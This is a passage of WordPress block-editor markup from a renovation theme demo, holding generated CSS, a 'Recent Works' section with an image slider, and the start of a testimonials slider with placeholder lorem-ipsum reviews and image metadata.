{\"block_id\":\"ea758d60-1070-4457-bba0-2dc439d62cfc\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ea758d60-1070-4457-bba0-2dc439d62cfc {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-ea758d60-1070-4457-bba0-2dc439d62cfc\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We take pride in our work</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17}},\"textColor\":\"white\",\"className\":\"section-content\"} -->\n<p class=\"section-content has-white-color has-text-color\" style=\"font-size:17px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy telluseu semper nunc finibus placerat. Suspendissee potenti. Praesent vel sem in sem vulputate.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":50} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"VIEW ALL WORKS\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/recent-works/\",\"counterId\":\"7fdef199-26ec-46ac-b2e9-e54d01000475\",\"vPadding\":17,\"hPadding\":35,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"#0d2e63\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#ffffff\",\"buttonFontWeight\":\"700\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px !important; margin-bottom: 10px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 17px; padding-bottom: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: #0d2e63; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 700; line-height: undefined; opacity: 1; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #ffffff; }\n</style><style type=\"text/css\"> .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-7fdef199-26ec-46ac-b2e9-e54d01000475 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/recent-works/\">VIEW ALL WORKS</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":66,\"leftPadding\":120,\"leftPaddingTablet\":50,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"799c0c3e-07f2-4e52-9d26-ea0695d46ba3\"} -->\n<style type=\"text/css\"> .block-799c0c3e-07f2-4e52-9d26-ea0695d46ba3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-799c0c3e-07f2-4e52-9d26-ea0695d46ba3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-799c0c3e-07f2-4e52-9d26-ea0695d46ba3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 120px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-799c0c3e-07f2-4e52-9d26-ea0695d46ba3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-799c0c3e-07f2-4e52-9d26-ea0695d46ba3 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-799c0c3e-07f2-4e52-9d26-ea0695d46ba3\" style=\"width:66%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":450,\"autoPlay\":true,\"autoPlaySpeed\":\"2000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#ffffff\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"65765de4-dd35-485b-ab5d-8cea73c0a470\"} -->\n<style type=\"text/css\"> .block-id-65765de4-dd35-485b-ab5d-8cea73c0a470 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-65765de4-dd35-485b-ab5d-8cea73c0a470 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-65765de4-dd35-485b-ab5d-8cea73c0a470 .skt-blocks-gallery--item figure {\n height: 430px; }\n</style><div class=\"\"><div class=\"block-id-65765de4-dd35-485b-ab5d-8cea73c0a470 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:450px\" data-flickity=\"{&quot;autoPlay&quot;:2000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#ffffff\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ed1066c0-1185-4393-8e20-b2ae564fa298\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/testimonial-bg-img.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-4\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-4 skt-blocks-block-section-outer-wrap block-ed1066c0-1185-4393-8e20-b2ae564fa298 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ed1066c0-1185-4393-8e20-b2ae564fa298 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ed1066c0-1185-4393-8e20-b2ae564fa298 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ed1066c0-1185-4393-8e20-b2ae564fa298 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-ed1066c0-1185-4393-8e20-b2ae564fa298.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/testimonial-bg-img.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ed1066c0-1185-4393-8e20-b2ae564fa298.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-ed1066c0-1185-4393-8e20-b2ae564fa298.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ed1066c0-1185-4393-8e20-b2ae564fa298.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ed1066c0-1185-4393-8e20-b2ae564fa298.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-ed1066c0-1185-4393-8e20-b2ae564fa298 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ed1066c0-1185-4393-8e20-b2ae564fa298 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ed1066c0-1185-4393-8e20-b2ae564fa298.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ed1066c0-1185-4393-8e20-b2ae564fa298 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ed1066c0-1185-4393-8e20-b2ae564fa298.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ed1066c0-1185-4393-8e20-b2ae564fa298 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ed1066c0-1185-4393-8e20-b2ae564fa298.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"fb0b0ea1-4ca3-458b-bf17-df9c5db208af\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-fb0b0ea1-4ca3-458b-bf17-df9c5db208af\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.\",\"name\":\"John Doe \",\"company\":\"Happy 